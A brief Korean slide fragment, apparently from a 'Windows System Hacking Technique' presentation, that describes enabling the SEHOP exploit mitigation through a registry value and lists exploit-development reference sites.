Ø 레지스트리를이용하여 SEHOP를사용하도록설정(직접설정)DisableExceptionChainValidation값이 1(해제) 또는 0(설정)

Reference

Reference

u 참고자료§ Corelan Windows Exploit Writing Tutorial(http://corelan.be)§ Exploit DB(http://exploit-db.com)§ OpenRCE(http://openrce.org)

Documents

Windows System Hacking Technique